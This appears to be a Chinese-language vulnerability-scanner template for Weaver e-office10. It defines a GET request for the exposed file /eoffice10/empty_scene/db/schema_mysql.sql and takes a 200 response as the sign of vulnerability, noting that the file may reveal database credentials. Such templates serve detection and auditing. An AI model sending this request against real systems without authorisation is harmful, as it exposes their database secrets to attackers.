keyword: e-office10 name: 泛微e-office10敏感信息泄露漏洞 description: | # 下一行可填写漏洞描述 泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞 requests: # 为空代表默认或者不启用 path: "/eoffice10/empty_scene/db/schema_mysql.sql" method: GET headers: User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/120.0.0.0Safari/537.36 body-raw: |- # 如果需要发送请求体,在下一行开始填写 response: path: "" # 不填则默认接收此请求的响应包 status-code: 200 body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 time: # 此处填写响应包响应时间,默认不启用 headers: Server: Content-type: Content-length: Date: Connection: impact: | # 下一行可填写漏洞影响 泄露数据库配置文件,可能导致攻击者攻击时逆向获取数据库密码。